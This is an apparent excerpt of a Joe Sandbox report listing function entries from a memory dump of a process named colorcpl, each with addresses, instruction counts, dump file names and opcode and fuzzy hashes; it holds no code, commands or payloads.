Uniqueness

Uniqueness Score: -1.00%

Function 043765D0 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a1e55f93382fa6e58157eecf2160d00597d4d4cb6516395c47d93a6d9ca5393
Instruction ID: f2447a6cc5953f9e04e193c9862fb6854bbd455c8790de817ce6ba0e575878e1
Opcode Fuzzy Hash: 1a1e55f93382fa6e58157eecf2160d00597d4d4cb6516395c47d93a6d9ca5393
Instruction Fuzzy Hash: C111BF72A00A05AFEB34CF59C5E1E5ABBE8EF94760F865079D9459B310D738ED00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 043CE461 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04584ef13a575e704797bf6b828ebb5d587870ab912918f8586a39175c4caafb
Instruction ID: 12e6170458a9f2829098b7d86705e1e7bade3f7cb8407a4df28ec48eca7d07a1
Opcode Fuzzy Hash: 04584ef13a575e704797bf6b828ebb5d587870ab912918f8586a39175c4caafb
Instruction Fuzzy Hash: 9511A032600604EFE7319F84C842B56BBE5FF84354F26946CE8059B160E734FD40CB90

Uniqueness

Uniqueness Score: -1.00%

Function 043BD69D Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 344a7ebce17cc95804a4fe4266c3854e038087be8121a2260c2918af3b52c5a9
Instruction ID: 8e363b2ce1bc2d1752eca42fc08827beb1b49e63b90a85c7df3e304c5aa905aa
Opcode Fuzzy Hash: 344a7ebce17cc95804a4fe4266c3854e038087be8121a2260c2918af3b52c5a9
Instruction Fuzzy Hash: F6112532500208BFD7059F6CD880DBEB7B9EF85344F108069FC848B250DA31ED44D7A4

Uniqueness

Uniqueness Score: -1.00%

Function 0436270D Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31576ecc66ee03ffe28dd8f8abc38a1e63f4234cb1bb312baf15c70f7aec7238
Instruction ID: 80d458c01f5f7a085e249f88bed6990373b978d7d201016dda95b23191c31d48
Opcode Fuzzy Hash: 31576ecc66ee03ffe28dd8f8abc38a1e63f4234cb1bb312baf15c70f7aec7238
Instruction Fuzzy Hash: B9014E327445449FF3257759C844F6777DDEF40754F0560A5F80287651E954FC00C231

Uniqueness

Uniqueness Score: -1.00%

Function 043445B0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbcb4e988cb34b0655965f54ae5ae5bb179e2b7f4e06bb43609a58f6d64eacd4
Instruction ID: b23cfe2f57b988860748e66c6f191a07c742c1f0a83d2e0de8136e6c621a9b38
Opcode Fuzzy Hash: cbcb4e988cb34b0655965f54ae5ae5bb179e2b7f4e06bb43609a58f6d64eacd4
Instruction Fuzzy Hash: 2811A072600684AFEB21DF69D840B9677E8EBA4B64F01612AF9048B690D378F840CF60

Uniqueness

Uniqueness Score: -1.00%

Function 04376540 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d15130cc38f72030ebc667a10e1596833d6f08c0fb3921952c5a13e686428a73
Instruction ID: 4cb8e2f2b7c5f7f0528f2f4985c88bceb531cf82b73f095adff7c988696090c6
Opcode Fuzzy Hash: d15130cc38f72030ebc667a10e1596833d6f08c0fb3921952c5a13e686428a73
Instruction Fuzzy Hash: F511A072A00B15ABEB319B58C991B5EF7B8EF88720F501459D94177204C738FE009F90

Uniqueness

Uniqueness Score: -1.00%

Function 0436E45E Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 455bce23832b52538749159921cc7050e51cacc56926870afb5c52b8d3feabff
Instruction ID: 2a7da6952d3f7768ec88e07988ed02ac814427318a76837b6c88300ae1af61a9
Opcode Fuzzy Hash: 455bce23832b52538749159921cc7050e51cacc56926870afb5c52b8d3feabff
Instruction Fuzzy Hash: CF112B36785A818FE7238B28C444B2577ECEF41BA8F1920E0DD028BA95E728F821D751

Uniqueness

Uniqueness Score: -1.00%

Function 04373740 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 896d5d070b094a4bdea12c162ddd5f8ed4676de19b277f4862d0564ff8596b09
Instruction ID: 1e91389bd3a43ca08ae063c139f27f34fc79e91837a2d53e051940e577463153
Opcode Fuzzy Hash: 896d5d070b094a4bdea12c162ddd5f8ed4676de19b277f4862d0564ff8596b09
Instruction Fuzzy Hash: BD114CB561428ADFD754CF18D480A95BBF4FB49310F049296E888CB311D735E880DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0436F1F0 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7913250533b26b600e3944c5c0bd33e63bc2bcfe5f00a377e9b47d4e7e17dbbe
Instruction ID: 134baf17e34c6519b52b0efe48999760da88bbf3b0b4c825a82dadd88f199f83
Opcode Fuzzy Hash: 7913250533b26b600e3944c5c0bd33e63bc2bcfe5f00a377e9b47d4e7e17dbbe
Instruction Fuzzy Hash: F011C2766006489BD720DF69C844FAAB7F8FF44704F1450B9E901AB656EA38E901CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04346179 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0dc661bd549251ddc056f3937a40cd2a9f1f16f3e47fdbec80368fd689bdab0
Instruction ID: ddcfab6baff608bcb967582073085ec47684f70086f9654460b981f7b64b9ada
Opcode Fuzzy Hash: f0dc661bd549251ddc056f3937a40cd2a9f1f16f3e47fdbec80368fd689bdab0
Instruction Fuzzy Hash: CE115A71641218ABEB35EF24CC42FE9B2B4EF04714F1051D8A619A60E0DB34BE85CF84

Uniqueness

Uniqueness Score: -1.00%

Function 043CC490 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8eff50a2dcf04261666856290f4fb2067dcabdc3f002206caa96ac81ed91619a
Instruction ID: 492b7ef1683eb479ed81008e82ba8e1dfe3bb3d3e0150a7fa4de1184f87a8687
Opcode Fuzzy Hash: 8eff50a2dcf04261666856290f4fb2067dcabdc3f002206caa96ac81ed91619a
Instruction Fuzzy Hash: 6011E8B1A002599FDB04DFA9D541AAEB7F8EF58704F10806AB905E7341D674EA01CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 043D6090 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b51c06849b65b2507555081db36ff7fc33c9f745eb96692de562337e15c22a2
Instruction ID: eab9d394ba772c2e0c6d6077436900f3be7eb4dae89f9da0effbb1f258351ad2
Opcode Fuzzy Hash: 4b51c06849b65b2507555081db36ff7fc33c9f745eb96692de562337e15c22a2
Instruction Fuzzy Hash: FB11A1336445469FD711CF59E801BA2BBB9FB8A314F088159E8588B312DB32F885CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0437E4EF Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f55233367e6ea76aa38b8374265e4eee77ba0e22769956c892628783e522831
Instruction ID: f452cbdb7583a3334382f52b779cf2f1d521821187450c6abc9c0b252696c2b9
Opcode Fuzzy Hash: 9f55233367e6ea76aa38b8374265e4eee77ba0e22769956c892628783e522831
Instruction Fuzzy Hash: D5018FB1201A45BFE721AB79CD80F57B7ACEF98B68B051165BA0583960DB64FC01CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 043D6550 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e269c5de4799ad33c1369e88589b20ca13255622ab8283dbbacbd6872b61d303
Instruction ID: 27bd20cd4f69ab7fdb0ad54c98a930f9b24331e85b7266cd6e9121c3a5b2f902
Opcode Fuzzy Hash: e269c5de4799ad33c1369e88589b20ca13255622ab8283dbbacbd6872b61d303
Instruction Fuzzy Hash: 8F012833204611DBD720EF28D849A66F7A9EF95664F10022DF83987280E730F950CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 043FF68C Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40f5507cbafa2c5a2d747ad5b5e2a450065ec196744fcbf9f27f41ead22db85e
Instruction ID: b6dcdd55d79c9f66665e30f4d4923b7e108c0d33ab7a6b4fa792c03a292d957b
Opcode Fuzzy Hash: 40f5507cbafa2c5a2d747ad5b5e2a450065ec196744fcbf9f27f41ead22db85e
Instruction Fuzzy Hash: EC116571A00349EFD704DF69D845E9EBBF8EF44704F10405AB900EB391DA74EA00C790

Uniqueness

Uniqueness Score: -1.00%

Function 04382010 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e90afd2b50bc88f396677166514cca69b17ec0efa38808f25c0733109432c9cc
Instruction ID: a977bef6e331375f980f5c36e4e4686c384f9ddcf18ff601bf610afb0fe38798
Opcode Fuzzy Hash: e90afd2b50bc88f396677166514cca69b17ec0efa38808f25c0733109432c9cc
Instruction Fuzzy Hash: 6D116D71A00208EFEB04EF64C850FAEBBB9EF44714F005099F9119B280EA35FD15CB90

Uniqueness

Uniqueness Score: -1.00%

Function 043CC5FC Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 592b3d70d7472c4e1f14bc95e0dd71b134d61504b279c0409be873b9b0566bd5
Instruction ID: 934d34d112f5069a6757ede60a2e10c7f899a1132391b80450ca748424468d49
Opcode Fuzzy Hash: 592b3d70d7472c4e1f14bc95e0dd71b134d61504b279c0409be873b9b0566bd5
Instruction Fuzzy Hash: AC1179B16083049FD700DF29C441A5BBBE8EF88B10F00995EB958D7391E630E910CB92

Uniqueness

Uniqueness Score: -1.00%

Function 04414600 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: deabd88390078362f9191f43be5e77a801157fca1f27e4f3f2c8ea50d30b1bb8
Instruction ID: fe140ff56120371774ee583623ebf66bdedfd2979abebd638e6bb51d436a55ea
Opcode Fuzzy Hash: deabd88390078362f9191f43be5e77a801157fca1f27e4f3f2c8ea50d30b1bb8
Instruction Fuzzy Hash: 1201D4322006019FDB25DA65D841F57B3EAFFC5348F04485AE5528B774DA74F881CB90

Uniqueness

Uniqueness Score: -1.00%

Function 043CC691 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae897e0f730e554ae06bbed98e473ae9c08692d2e8597361e9585a94fbef98aa
Instruction ID: 289e11338671021740b1aecb1bc418959240e079d2e025c9335e24f1f32a7aad
Opcode Fuzzy Hash: ae897e0f730e554ae06bbed98e473ae9c08692d2e8597361e9585a94fbef98aa
Instruction Fuzzy Hash: 3A1179B16083449FD300DF69C841A4BBBE8EF88710F00995EB958D7391E630E910CB92

Uniqueness

Uniqueness Score: -1.00%

Function 043CC0E0 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d47b315370a0eacf1675fd5d04f06cfdd280d8339396c7f1d7900737716579a
Instruction ID: 70d2cb1635f82ed282f4c0fda65b0ac7e2c4eb0ad7454a242cea6d54d1bb11d8
Opcode Fuzzy Hash: 0d47b315370a0eacf1675fd5d04f06cfdd280d8339396c7f1d7900737716579a
Instruction Fuzzy Hash: B2116930A00208EFDB15EFA5C840EAEBBB9EF48704F005099FD1597380EA34ED11CB90

Uniqueness

Uniqueness Score: -1.00%

Function 043FF478 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bfee088f2244e9cd29c9b291cc6729a88fcb19f3318a7925be6f3285a51e37b
Instruction ID: c3dd9f1fda1cf4b9759bfb682d4a507ec2fef568a77ce91274da82a47cb22d88
Opcode Fuzzy Hash: 9bfee088f2244e9cd29c9b291cc6729a88fcb19f3318a7925be6f3285a51e37b
Instruction Fuzzy Hash: 39011271A01259ABDB14EFA9D845EAEB7B8EF44714F10405AB901EB281D674EA01C790

Uniqueness

Uniqueness Score: -1.00%

Function 043FF4FD Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b2f83eb2fcbd01033c38a5a3aa630b2529f334d6cfbe97a4205c6a9f2e3a22d
Instruction ID: f807ba9a1cf77a8febc2263a0d08b932dc75739c021320710704be11682d5221
Opcode Fuzzy Hash: 0b2f83eb2fcbd01033c38a5a3aa630b2529f334d6cfbe97a4205c6a9f2e3a22d
Instruction Fuzzy Hash: 19019271A00218ABD704EFA9D845EAEB7B8EF44714F00405AB914EB281D674EA00CB90

Uniqueness

Uniqueness Score: -1.00%

Function 043FF582 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8287854c57350b9df9121384213cb693e013666dee99d30937db97ca11de3ce
Instruction ID: 97df2f27a7c3ca7dcd9ab5d2da5801492f570c792bb5760a607a8d33e68d047b
Opcode Fuzzy Hash: f8287854c57350b9df9121384213cb693e013666dee99d30937db97ca11de3ce
Instruction Fuzzy Hash: 9D015271A01258ABDB14EFA9D845FAEBBB8EF44714F40405AB905EB281DA74EA01CB94

Uniqueness

Uniqueness Score: -1.00%

Function 043FF607 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6925c5c235c300abe70da055a164a0a825ee0acfe2d695df55cca36cb4f16535
Instruction ID: 2ce35d060816525d400e38319067b263af5d8ec55fca12ee90e759bc6f33be7c
Opcode Fuzzy Hash: 6925c5c235c300abe70da055a164a0a825ee0acfe2d695df55cca36cb4f16535
Instruction Fuzzy Hash: C8017571A01358AFD704EFA9D845FAEB7F8EF44714F40405AB900EB381DA74EA01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0437D0F0 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e905e72580299d3ff224864fab82429879ab6b6a98a0ce6375e50d02db9b367
Instruction ID: fcf89f40c52ac8714e652584c64b9afb515feb6b950dbf9725fcefcf59d0f9bf
Opcode Fuzzy Hash: 6e905e72580299d3ff224864fab82429879ab6b6a98a0ce6375e50d02db9b367
Instruction Fuzzy Hash: 400147326006009BEB70AA14C800F6973A9DFC0BE4F14515AEEA58B690EB38F900C781

Uniqueness

Uniqueness Score: -1.00%

Function 043FF13E Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb0a08543ff4c74ebfaa622b04519efc2cbad65ff09d2e59290bffb6f48975b8
Instruction ID: 328021e388663d76b018405aa00c266c4941842db0547fcf65811b4dbf591cde
Opcode Fuzzy Hash: cb0a08543ff4c74ebfaa622b04519efc2cbad65ff09d2e59290bffb6f48975b8
Instruction Fuzzy Hash: 7D017570A00358EFDB14EF69D841FAEB7F8EF44704F40405AB911EB281D674EA01CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0437415F Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99155b897948443172c5b512e6d118e498ac084c00c18ce213d01fe4197adb41
Instruction ID: a23c8b6f3a1bc9e6057fe36963a2c512d17e8b51bdbe10e5ec208a372eeb04cf
Opcode Fuzzy Hash: 99155b897948443172c5b512e6d118e498ac084c00c18ce213d01fe4197adb41
Instruction Fuzzy Hash: F5014E362001119BC335DF3EC918AA2BBECFB693547041259D498C3F10D23AFA01CB50

Uniqueness

Uniqueness Score: -1.00%

Function 043424A2 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fde14c69f642c1af37800688ba547e7dad1510593ed2424e8e2e1f5aea9ff2e
Instruction ID: a850072f2025bb4454a88b2ca7ffb6a4686b8dd324b075405c55eb042e0bcc98
Opcode Fuzzy Hash: 3fde14c69f642c1af37800688ba547e7dad1510593ed2424e8e2e1f5aea9ff2e
Instruction Fuzzy Hash: 27F0A432741A60BBD731DF568D40F57BAEDEFC4BA0F254069BA05A7650D620FD01DAA0

Uniqueness

Uniqueness Score: -1.00%

Function 044151B6 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d1bb3fbc49893e112c301e2bc1f9dd95fe9d386ad867320e9db5ee31ec59af6
Instruction ID: 8500827c01596da94b3d88a305c3f8bcf60f4b68efe902b73a86b30305ff2c80
Opcode Fuzzy Hash: 2d1bb3fbc49893e112c301e2bc1f9dd95fe9d386ad867320e9db5ee31ec59af6
Instruction Fuzzy Hash: 32118074E10259EFDB04EFA9D441A9EB7B4EF48704F14805AB815EB351E734EA02CB54

Uniqueness

Uniqueness Score: -1.00%

